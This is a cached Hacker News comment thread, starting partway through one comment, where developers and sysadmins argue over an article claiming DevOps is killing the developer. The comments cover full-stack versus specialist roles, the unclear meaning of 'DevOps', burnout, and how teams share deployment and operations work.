- Difficulty hiring specialists. Various reasons for it, but still valid.

At another company I worked, there was a lot of "integration development", where your time was spent connecting various internal and external systems together, software-wise, developing tools that support systems work (i.e., tools for sysadmins), and developing other tools that are for end-users, but have a heavy systems component (management software for DNS, for example.) That meant understanding each part of the stack from both a development and system perspective. Another is interest level. A few of us were full-stack developers because we were studied more than just development in our free time, and we took that with us to work. This wound up benefiting everyone. This also led to us being the go-to people (that is, the top level of internal support) for both more specialist internal developers and sysadmins, as we had deep knowledge of the internal systems from the bottom to the top the stack, and the knowledge and experience to explain and troubleshoot problems to people in those other roles.

The author is correct in that this may be more /common/ at startups (the previous startup I worked at did in fact operate as the post describes), and is sometimes done out of necessity. It is by no means limited to those environments, however.

Edit: I'd also separate DevOps from full-stack engineer. They sound like the same thing, and if you squint from far enough away, they look like the same thing. The terminology may be fluid, but I think (as some other comments state), that DevOps is more centered around "coding for systems automation", whereas "full-stack engineering" is a much more general term which can encompass a variety of different types of tasks in different environments with varying levels of knowledge/experience in the different parts of the stack/tools.

14
headShrinker 2 days ago 0 replies      
Because of an abnormal learning style, severely dyslexic, I have never fit in to corporate environments. Looking past the egregious spelling errors, being a slow learner isn't a winning talent in a job interview. As a result, I've fallen in to the trap of full stack (jack of all trades) developer consultant for a little over a decade now. I never got very good at anything in particular. Thus, I have battled with burn out for many years now, and am passively seeking another careers outside of Internet technologies. Point of the article is close to home.

The burnout aside, there is a plus to someone being proficient at many related tasks; having a somewhat in-depth knowledge of how all these technologies come together. The point is not all jobs require the best, most expert techniques. As in the case of the jack-of-all-trades carpenter, as long as he knows when to call the specialist, he is still getting the jobs, as am I.

15
agentultra 2 days ago 0 replies      
I'm a terrible system administrator. Everything I've learned about it has come from necessity because startups. I don't want to be a system administrator and have no desire to be good at it. So I learn the minimum I need in order to get it to do what I need to do and hope that I've done it right.

I might only be slightly better than someone who's new to system administration only because I've written system-level code and understand operating systems and things of that nature.

However a good system administrator understands the entire architecture from a holistic point of view. They know the compiler switches to use, the run-time switches to tweak, the security implications of various configurations and all of the other details it takes to keep a cluster secure.

I often work well with a good system administrator to debug and optimize workloads due to the overlap in our skills. I find this to be the optimal relationship.

Learning and practicing system administration takes away from my ability to learn and be a better programmer (and the opposite is true as well). I don't know about most people but I find I can't be good at both. And I know which one I'd rather be better at (programming).

I don't think the author has hit the nail on the head but I agree that effective teams can't expect one person to manage an entire application from code to managing a secure deployment.

16
nailer 2 days ago 2 replies      
In my own experience I don't think developers were ever pushed to become devops (as the article asserts).

Instead, about 40% what was called 'sys admins' were pushed to become devops. The 'sys admin who knew cfengine' became a 'devops person who knew ansible'. Deploys and cloud APIs just became another thing to automate.

The bottom 60% - the shit ones who got paid 120,000GBP to copy paste commands they didn't understand from word documents into Solaris 8 boxes in 2010 because they couldn't actually automate anything - left the industry.

17
ajdecon 2 days ago 0 replies      
DevOps is a rather overloaded term at the moment. I've seen it refer to any of the following:

- Encouraging collaboration between your Dev, Ops, and QA teams, with some cross-training so they can work together better

- Merging those teams under the same manager to try to improve that collaboration

- Making your developers responsible for all those roles, and never hiring a dedicated sysadmin or QA engineer

I personally think any of those is fine. Startups will err toward having fewer people and all of them be developers, while in a larger company it probably makes sense to specialize more and make "DevOps" mean close collaboration between those teams.

Of course, I've also seen "DevOps" as a job title for what would have previously been a "system administrator" or "site reliability engineer", and I have much less patience for that. :) Occasionally I see a job posting for a role that is actually dev + ops, but most often a "DevOps" posting means "we need a sysadmin, but we don't think sysadmins are cool enough to work here."

18
farmdawgnation 2 days ago 0 replies      
I'm not so sure your usage of the term "full-stack engineer" is accurate here. I consider myself full-stack, but I don't know half the stuff about Chef that our DevOps guy does and I'm ok with that. To me, a full-stack engineer means that I'm capable of coding both things that make magic happen in the browser and things that make magic happen on the server side of the application. It doesn't mean I'm a jack of all trades.

That said, I don't think that the increased prevalence of DevOps is bad. And I don't think it means "everyone is doing everything" either. It's a new role that is borrowing elements from both development and operations. Not one person doing both roles.

19
sev 2 days ago 0 replies      
I work at a large enterprise company and for a while I was part of the DevOps team as a software engineer.

Some of our goals included:

   - Building the continuous integration/delivery pipeline      - Moving codebases from one source control system to another    - Creating programs/systems to automate tagging of builds      - Automating the deployment processes of multiple applications onto non-production servers    - Implementing and maintaining the functional testing frameworks and server grids
The more I look at these goals, the more I realize that the developers who work on feature delivery should not worry about these anyway. So I disagree that DevOps is killing the developer. In fact, DevOps is helping the developers focus on what's important.

20
justizin 2 days ago 0 replies      
"The underlying cause of my pain? This fact: not every company is a start-up, though it appears that every company must act as though they were."

DevOps is not about startups, DevOps is about avoiding the pitfalls of big companies who completely fail and leave all of their employees jobless by focusing on all of the wrong decisions and initiatives.

It's about outlawing cowboy coding and other bad habits that people pick up as hobbyists, and intertwining business and technical objectives reasonably.

Why is a full-stack developer important? Why is eroding the difference in responsibility between Dev, Ops, and QA important? Because traditionally along these boundaries have been opportunities for individuals to absolve themselves of responsibility. More than anything, DevOps is about not living in that world anymore.

Some people won't survive outside that world. Those who want to will read "The Phoenix Project" by Gene Kim.

21
phamilton 2 days ago 0 replies      
I personally think DevOps is terribly misunderstood. I think the best way to describe DevOps to that it broke down the traditional Ops/QA/Developer roles into different roles, namely SRE, Platform Engineer, and Developer.

Developers take on the new responsibilities of being able to independently deploy their code, instrument and monitor stability and own test/QA.

Platform Engineering is about building a robust infrastructure and the tooling needed for Developers to handle the new responsibilities. This includes packaging, monitoring, deployment, AB testing, etc.

Site Reliability Engineering is about dealing with fires outside of the codebase. Hardware failures, network connectivity issues, etc.

I don't think any of these roles becomes a "Jack of all trades, master at none" situation. It does, however, cut out some of the more typical engineering roles. While developers just took on additional responsibilities, QA engineers and traditional Ops are forced to repurpose their skill set.

22
chronid 2 days ago 2 replies      
I don't really think a good developer can replace a good sysadmin. The reverse is true too, this is not a flamebait! :P

I don't see "DevOps" as a way to replace some roles - but as a way to make everyone work better together. Instead of living each in their own bubble (and in my - pretty limited I admit - experience it always) everyone has to know, at least a little, what someone else does. It really helps everyone at the end of the day.And the developer can keep coding without me screaming at him because he placed the database connection string in a configuration file that sits inside a .jar that sits inside a .war and so on.

23
Xylakant 2 days ago 0 replies      
I think DevOps is very much a web-application thing (where web-application includes intranets, ... basically anything that speaks tcp). I seriously see the need there. I still remember the days when developers would build an application that worked on their system and then handed it off to Ops, hoping to never hear back from it. I interviewed developers that could not tell me which webserver or application server their company was running in production, even though capabilities and performance characteristics differ wildly. The DevOps role is trying to bridge the gap, it's the jack of all trades, that knows enough of every piece of the system to debug issues that happen at those boundaries. Is this DB problem a machine issue, do we just need new hardware? Is it an application problem (n+1 queries) and where could those be? How can I structure my stack in a way to hand of tasks to the place where they can be solved efficiently. The implementation of those solutions can be handled by domain experts, but someone needs to keep all those pieces from breaking apart at the seams. In the web world, that's the DevOps.
24
nnq 2 days ago 0 replies      
Are any other companies besides (well funded) startups actually hiring people as "full stack developers"? I mean, yeah, it's normal to look for candidates with full stack experience, but not to hire them in an actual job position that requires them to do full-stack work... it's a big difference.

(sorry if the q is off topic, I don't really understand what OP is ranting about with the devops problems, so I'm referring to the only part of the article that makes any sense to me, that about the full-stack devs...)

25
Glyptodon 2 days ago 0 replies      
It's not so much that DevOps is killing the developer as it's the expectation that you can have your regular general purpose developers do your DevOps on the side.

I can relate to the downsides pretty well - I'm the only developer in my group and my job is mostly to develop web apps, but the IT side doesn't have much knowledge of modern tools - they live in the era 'just use Drupal and Apache' so I'm often the one who ends up having to figure out the deployment of the applications I work on (and also help with random problems from their OTB apps) and such.

To be honest, I don't mind when it's DB stuff because I'm pretty comfortable with it and have plenty of background with various SQL DBs, and it's not a time black hole, but when it comes to configuring servers and deployment I hate having to deal with the DevOps because there are so many pieces I never have the time to really become comfortable with them all and I feel very inefficient. Accomplishing something doesn't always take long itself, but it can require spending a day of reading wikis and documentation to accomplish something simple when you've got a lot of moving parts. And the worst part is that you have to deal with the DevOps bits so infrequently it's like you have to relearn them each time.

26
clone1018 2 days ago 2 replies      
"If you are a developer of moderately sized software, you need a deployment system in place. Quick, what are the benefits and drawbacks of the following such systems: Puppet, Chef, Salt, Ansible, Vagrant, Docker. Now implement your deployment solution! Did you even realize which systems had no business being in that list?"

I'm not understanding this, you can deploy with Puppet, Chef, Salt, Ansible, Vagrant and Docker. With Vagrant you can deploy a bare image and use Chef (or one of the others) or you can just deploy a fully setup box file (like with Docker).

27
cruise02 2 days ago 1 reply      
> ...the old "waterfall" develop-test-release cycle is seen as broken.

Waterfall is not just seen as broken, it was always broken.

28
dominotw 2 days ago 1 reply      
As someone who is moving into more of a devops role from a pure development role. Here is my learning list so far.

1. The TCP/IP Guide: A Comprehensive, Illustrated Internet Protocols Reference. http://www.amazon.com/The-TCP-Guide-Comprehensive-Illustrate...

2. Advanced Programming in the UNIX Environment http://www.amazon.com/Programming-Environment-Addison-Wesley...

3. A systems programming language- I choose golang.

4. GDB/makefiles

5. SSH, The Secure Shell: The Definitive Guide: The Definitive Guide http://www.amazon.com/SSH-Secure-Shell-Definitive-Guide-eboo...

29
mncolinlee 2 days ago 0 replies      
I couldn't disagree more about his portrayal of DevOps. There are companies misusing any and all paradigms of development. Google "cowboy coding agile" to see what I mean.

When I think of DevOps, I don't think of having everyone know everything. Ops staff have to know enough code to write deployment automation scripts and dev staff need to know enough system administration to step up and help when the monitoring or deployment automation breaks.

It's meant to be a partnership to maintain a system rather than the old practice of throwing code over the wall. It really harms morale to have the developers all enjoying wonderful weekends while ops is on red alert because app changes they don't understand broke everything in production.

30
scottschulthess 1 day ago 1 reply      
Overspecialization is the source of a organizational smells in a lot of medium-sized engineering companies - a lot of times it's better to have generalist engineers with some specializations in what you need to do than a bunch of specialists for a bunch of reasons, among them:

- (pure) Specialists often don't understand how their decisions affect other systems (and middle management or communication isn't always a solution)

- (pure) Specialists tie you to a particular technology when in reality you may need to evolve to use other technologies.

- If you need a bunch of different specialists to get something simple done (perhaps something you don't do all the time so don't have a process in place), just because they are siloed, it's a lot more complex and usually ends up badly designed (because it's harder to be iterative across teams). Generalists can get simple things done that require different skill sets to accomplish.

31
ltcoleman 2 days ago 1 reply      
From my point of view, this is due to lack of tech education. There just are not enough people graduating/learning the technical skills necessary for medium to large size software companies to employ.

I am a manager/developer/architect at a relatively large software company, and we have to task our developers with devops-type tasks constantly. Not because we want our developers spending time outside of coding, but because for lack of ability to hire the competency needed.

As you stated, good developers can generally perform these tasks so when you have nobody lower to perform them they become a weight on the developers' shoulders.

No it isn't necessarily fair, and yes, I believe in the future specialization will come back as the education system starts to realize there are many jobs in tech, not just a Comp Sci degree jobs.

32
mark_l_watson 2 days ago 0 replies      
+1 I don't agree, but an interesting article anyways.

I have worked with DBAs who had PhDs and could have still done development, but they moved past that to concentrate on schema development, scaling, etc. Toss into the mix modern programs of master data development inside organizations and people who are characterized as DBAs have a very sophisticated role.

Also, for small projects, devops makes all the sense in the world to me. Deeply understanding how an entire system works is valuable.

33
cparedes 2 days ago 1 reply      
IMO, Amazon gets 'DevOps' right. It's mostly just called 'ownership' over in Amazon. (source: I used to work in Amazon as a systems engineer)

You still have specializations - SDE's, systems engineers, DBA's, etc. However, if you write code and it ends up in production, you are responsible for the proper function of that code in production. As a friend of mine put it in terms of developers who don't want to be on-call: 'what, you don't trust the quality of your code?'

DevOps is simply a nicer way of just saying, "own your damn code." The corollary to this is that the organization must help you in getting to that state where you can effectively own your code - this means collaboration (so that you build maintainable systems) and building tools that enable fairly frictionless code ownership.

34
mattgreenrocks 2 days ago 1 reply      
Related: I'm curious if 'full-stack' devs find themselves making more money than 'half-stack' devs. After all, you're doing more as part of your job, and you're a chimera.

If not, then aren't you being taken advantage of?

35
georgebarnett 2 days ago 0 replies      
In the same way that being able to cook dinner doesn't make me a chef, while it's true that a developer can be a sysadmin, QA or DBA, they won't do a very good job.

To suggest otherwise shows a complete lack of understanding of the nuance of those roles.

As for suggesting that "DevOps" is killing the developer - the only thing "DevOps" is doing is polluting our common language with a term that doesn't actually mean anything concrete. It's perfect consultant speak.

36
paulbjensen 2 days ago 1 reply      
This article pretty much resonates with my experience, except that my employer (a 4 person established company) can't afford to hire a QA and sysadmin alongside my role as developer.

The bad side is that doing this DevOps role across multiple projects at the same time can lead to burnout, and I think I came close to that in the last few months.

The good side is that I've learnt a great deal about how to architect and deploy distributed web systems, how to do end-to-end testing, and how to effectively run the ops side of the business.

It's a mixed bag, and the burnout is the worst aspect of it, as well as the case where people are forced into situations where they are way in over their head.

37
jedmeyers 2 days ago 0 replies      
The description of DevOps from the article describes what I do at a large multinational software company really well. In our project we have 5-7 developers who test each others code and functionality and one DevOps who does build/test environment, databases, release management, change management, impact analysis with regression testing, and fixes bugs, but rarely develops new features. It's being done not because of the startup culture, which we do not have. It's done for efficiency. Every request to the DB team, even minor, will take at least three days to process. We do not have so much time to waste, so we have to do everything ourselves, unless it's something that requires an actual expert in the particular topic to accomplish.
38
rythie 2 days ago 0 replies      
I think there is a lot miss understanding here, to me DevOps is not just automation (we've had that for a long time, Perl, cron, cfengine etc).

It's much about applying the same processes you would apply in development to Ops. For example committing changes into version control and only using that, not live patching things, much like you wouldn't live edit a website.

Also being able to spin up new servers based on a config and not requiring manual config to get it going. Automation alone does not get rid of 'snowflake servers' http://martinfowler.com/bliki/SnowflakeServer.html

Also, it can be about letting developers get the exact same environment for development/testing at no additional time cost - which in turn makes it more like that code changes can go live without problems or delays.

39
mh_yam 1 day ago 0 replies      
Every place I've seen DevOps, seems that developers bear the brunt of the work - learning the infrastructure and understanding deployments and such. I've never seen Ops people learning the codebase or even the software architecture / data structures.

Maybe that wasn't true "DevOps"?

40
rmrfrmrf 2 days ago 0 replies      
While I get the need for page views, I really wish problematic aspects of any tech movement could be discussed in a way that actually improves things rather than tears them down.

You hate xyz? OK, but apparently xyz has enough merit to get the attention of quite a few people, so let's identify the problem areas and make xyz better rather than resorting to hyperbole and melodrama.

41
danso 2 days ago 0 replies      
The OP makes a relatively uncontroversial point (that people will be specialized, and better, at a finite set of skills)...so I think "killing the developer" is a little dramatic.

However, I think as with most things that involve computational thinking and automation, this is not a zero-sum game. A developer who can apply deterministic, testable processes to server-ops may be able to reap an adequate amount of benefit for significantly lower cost than a specialized sysadmin. In addition, the developer is augmenting his/her own skills in the process. Yes, that dev was not able to focus all of their time on...whatever part of the stack they are meant to specialize in...on the other hand, the time spent studying dev ops is not necessarily a sunk cost.

For my own part, I've tried to stay away from sys-admin as much as possible...but when I've been pushed into it, I've gotten something out of it beyond just getting the damn server up. For example, better familiarity with UNIX tools and the importance of "text-as-an-interface"...which does apply to high-level web development...nevermind the efficiency you gain by being able to stay in the shell when most appropriate (rather than, say, figure out how to wrangle server commands in a brittle capistrano script).

But hell, even the end product itself, just being able to deploy a server with some confidence...is kind of empowering. For me, it opens up new ways to run scripts and jobs...It sounds dumb and maybe it's just the way my brain poorly functions, but the concepts of server-oriented architecture become so much clearer when you can spin up different machines to play with and experiment with delegation.

42
mathattack 2 days ago 0 replies      
It seems like the OP is advocating the surgical team [0] approach to software development. This seems very consistent with DevOps. Have a group of specialists that are good at automating operations surround the key developers.

[0] http://c2.com/cgi/wiki?SurgicalTeam

43
fauigerzigerk 2 days ago 0 replies      
>Large companies love this, as it means they can hire far fewer people to do the same amount of work.

But they cost much more as well. Following that logic, it would be in the interest of hospitals to make "full-stack-doctors" clean toilets.

44
lawncheer 2 days ago 0 replies      
DevOps, at least imo, is not about technology. It is about culture, and applying practices to speed up the various loops across organizational groups (marketing, sales, developers, ops). Of course there will always be trade-offs, if you don't have the budget to hire both an expert in the technologies that, say for example, speed up configuration management, and prevent snowflake servers AND someone to develop the code for the product, the person you do hire, will have to either pull double duty, or the org will have to plan for the fact that it is probably going to be doing "stuff" slower.
45
rhizome 2 days ago 0 replies      
The problem with DevOps is that it's a meaningless term. Look at all the comments here, all starting off with what "DevOps is," or "Devops isn't." Instances of people arguing past each other based on different interpretations.

You can't have a fruitful discussion when everybody uses it differently.

46
cracell 2 days ago 0 replies      
The author needs to read or reread The Mythical Man Month. Even in a large organization there are important benefits to having fewer people on a team. Even if this means that someone is sometimes doing work that they are overqualified for.

He makes some good points but he misses the value of needing fewer people to accomplish the same thing.

47
TYPE_FASTER 2 days ago 0 replies      
The role of DevOps is to help developers work more efficiently, not give developers more work to do. An example of this could be a TFS administrator who works on TFS build template changes and configuration to make the build and deploy process as automated as possible. Nothing to do with being a startup, or trying to get more work done with fewer people.
48
mlieberman85 2 days ago 0 replies      
I disagree with the central thesis of his argument that being generalized is a detriment and that operations and other factors should remain siloed at your average large company. I've worked at both large companies (10k+ employees) and small companies and many things in between.

In general a Full Stack DevOps oriented approach always tends to be more efficient. You have less monolithic hard to maintain applications because you force the teams to be small and agile. People will have their specialties (operations, backend, frontend, etc.) but still remain generalized enough to have an idea of the big picture. If your application has issues where the frontend developer doesn't know the general idea of how Varnish and Nginx in your stack are setup then perhaps your application is too big and complex.

49
jassinpain 2 days ago 0 replies      
Before you start to complain, I am a fan of collaboration but Devops might just be the best joke ever! The truth is it means something different to every person. For years I have defined Devops as Engineers trying get Ops out of the way and pushing forward with out those pesky sys admins. Your think I am over blowing it? I have been in the Silicon Valley for the boom of Devops and I hear it all the time We dont need ops, we can just have a developer do it. The number of new startups who use AWS thus allowing them to forgo a system administrator never ceases to amaze me. My biggest problem with this is your cutting the legs out from yourself, but your assuring me job security so maybe I should keep my mouth shut.I have been a a operations engineer for over ten years now, and honestly developers and ops engineers have different ways of functioning. To me a good software engineer has long term focus, can get deep into a project and crunch on the same code for extended durations. Give a good coder a project that will take weeks or even months and they will put there head down and solve your problem. As a generalization these people do not handle interrupt driven work well, they also often do not handle high pressure situations well.Operations people on the other hand do the majority of their work under massive interruption and constant pressure. Tell a operations engineer the site is down and they will not focus on what the origin of the problem is, they will focus on getting the product back online and come back to fully understand why. This does not mean they do not troubleshoot but they are trying to identify the immediate cause not the who or root. One might argue this is short sited but when your stuck waiting for someone to figure out why the web severs where started your killing your customer experience. I would argue restart the web pool get the product back online and then start to look at root cause once you have identified the customer impact problem and completed the shortest path solution.When you start off by having your engineers run operations you never allow new ops people to start from ground up and develop their skills, learning the pain points as the system grows thus ensuring when you grow to the point that you need a operations engineer the is a shortage of trained people available. One might argue that some of the developers that started the company by running operations will become your operations engineers and will cover this but to me thats like using a vice grips to remove a bolt.
50
davidgerard 2 days ago 0 replies      
"As a sysadmin, I would like developers to pay any damn attention to what happens in live before deploy without me having to cattle-prod them into doing so after deploy, so I don't have due cause to set them on fire."
51
dnyce 2 days ago 0 replies      
I love this article and couldn't agree with it's central premise more. I can think of no other industry that demands an individual wear as many brain intensive hats as that of the developer today. These jobs which used to be distributed are quickly becoming the baseline for how an individual applicant is judged. I for one believe that if we focus, we can become a true master of skill AND compile that with understanding of the "whole stack" but never being forced to maintain more than our fair share of that stack.
52
balls187 2 days ago 0 replies      
What non-startups are trying to hire jack of all trade generalist devs?
53
rubiquity 2 days ago 0 replies      
Similar title: How Buzzwords Are Killing The Developer

... because DevOps is just a buzzword at this point.

54
markbnj 2 days ago 0 replies      
As a developer of course it's tempting to agree with the author's hierarchy. Masters of the IT world! But really it's over-simplified. As a dev with many years of experience there's no part of the stack I can't work in and figure out what I need to do. But that doesn't replace actual operational experience and oversight. You make do in startup or small team because you have to, so I guess ultimately I agree with the piece.
55
halayli 2 days ago 0 replies      
It's interesting to see how the term devops is stretched to mean anything you want. This term should die because it confuses many.
56
teacup50 2 days ago 0 replies      
The author couldn't be more off-base is his understanding of how devops came to be, and his attitude is exactly the kind of cost-ineffective developer behavior that led to the partial unification of development and operations to begin with.

It has nothing to do with limited startup resources, and everything to do with managing externalities.

Specifically, developers have an enormous amount of control over the stability and deployability of their software: technical decisions made at almost all levels of the stack directly and significantly impact the costs of QA and Operations.

The people best suited to automating deployment and ensuring code quality are the people writing the code.

If you entirely externalize the costs of those two things , natural human laziness takes over, and developers punt bugs and deployment costs to the external QA and operations teams, ballooning the overall cost to the company.

57
dmourati 2 days ago 0 replies      
Show me a developer who can do anything in Operations and I'll show you someone who gets the DevOps philosophy.
58
michaelochurch 2 days ago 0 replies      
It seems to me that the OP's real objection isn't to "DevOps" but with the reality of the software industry. He's upset that developers often are asked to do "lower" work. I find that a bit simplistic on his part. If anything, DevOps at its best is about elevating the ops work (by recognizing automation possibilities).

The issue is that employers are horribly inconsistent. They demand specialism in hiring, but refuse to respect specialties once they've pulled people in. Thus, you end up having to interview like a real computer scientist, only to find that most of the work is mind-numbing for a serious programmer, but that there's no one around at-level for it because "we only hire A players".

DevOps didn't do this. The problem is the industry, not one concept.

59
conorwade 2 days ago 1 reply      
Interesting. I always thought of "Full-stack" developers from a web perspective being capable of coding from the client to the server. Never thought of them being devs that do ops also.
60
LinuxDevOps 2 days ago 0 replies      
I'm glad to see that most people here are replying objecting that the writer's view or definition of a DevOps is not what seems to be the most accepted/popular view.
61
Finster 2 days ago 0 replies      
Hmm. Let's just ask the guy that took the Penny Arcade DevOps job.
62
RRRA 2 days ago 0 replies      
Most coders I see would be useless as sysadmins...
63
WWLink 2 days ago 0 replies      
I love the dentist example. Imagine if dentists were treated like developers. It'd be hilarious!
64
Fasebook 2 days ago 0 replies      
tl;dr: there's a problem here in software, and I don't know what it is, lets fix it by acknowledging its existence and then going back to what we normally do.
65
peterwwillis 2 days ago 0 replies      
This is a really badly written article but I know the point he's trying to make.

DevOps is stupid because it fractures expertise and makes it more difficult to get work done. By splitting up roles you get more domain-specific knowledge, have more time to work on a single problem, and provide support for your co-workers who also have different specific roles. I would much prefer to work with specialists than generalists.

66
manojit 2 days ago 1 reply      
To much scepticism.
67
dkarapetyan 2 days ago 1 reply      
There is no content here. Why are people explaining themselves and upvoting this nonsense?
       cached 18 April 2014 04:11:01 GMT